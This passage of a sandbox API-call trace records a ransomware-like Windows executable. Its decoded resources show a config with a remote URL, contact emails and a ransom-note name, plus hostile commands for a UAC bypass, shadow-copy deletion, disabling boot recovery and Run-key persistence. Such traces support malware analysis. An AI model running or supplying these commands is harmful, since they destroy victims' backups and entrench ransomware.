lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.394] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0108.395] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, 
lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.395] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0108.483] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0108.483] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0108.485] GetProcAddress (hModule=0x77380000, 
lpProcName="recv") returned 0x77386b0e [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0108.486] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0108.492] GetACP () returned 0x4e4 [0108.492] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0108.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: 
lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.492] GetTickCount () returned 0x25f6d [0108.492] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=16528157056) returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x53\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x69\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x42\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x45\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.493] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0108.493] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0108.493] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0108.493] LockResource (hResData=0x50d55c) returned 0x50d55c [0108.493] FreeResource (hResData=0x50d55c) returned 0 [0108.493] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.493] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.493] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.494] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.494] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.494] FreeResource (hResData=0x50d64c) returned 0 [0108.494] 
WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.494] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0108.494] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 
0x24 [0108.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0108.496] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0108.497] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0108.499] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0108.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0108.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0108.501] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: 
lpDst="C:\\ProgramData") returned 0xf [0108.503] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0108.503] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0108.503] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0108.503] LockResource (hResData=0x50d72c) returned 0x50d72c [0108.504] FreeResource (hResData=0x50d72c) returned 0 [0108.504] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.504] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.504] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.504] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.504] FreeResource (hResData=0x50d64c) returned 0 [0108.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.504] GetCurrentThreadId () returned 0xcb8 [0108.504] GetCurrentThreadId () returned 0xcb8 [0108.504] GetCurrentThreadId () returned 0xcb8 [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, 
cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0108.505] GetCurrentThreadId () returned 0xcb8 [0108.505] GetCurrentThreadId () returned 0xcb8 [0108.505] GetCurrentThreadId () returned 0xcb8 [0108.505] GetCurrentThread () 
returned 0xfffffffe [0108.505] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0108.505] GetLastError () returned 0x3f0 [0108.505] GetCurrentProcess () returned 0xffffffff [0108.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0108.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0108.505] CloseHandle (hObject=0xb8) returned 1 [0108.505] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.505] EqualSid (pSid1=0x2a6460*(Revision=0x1, 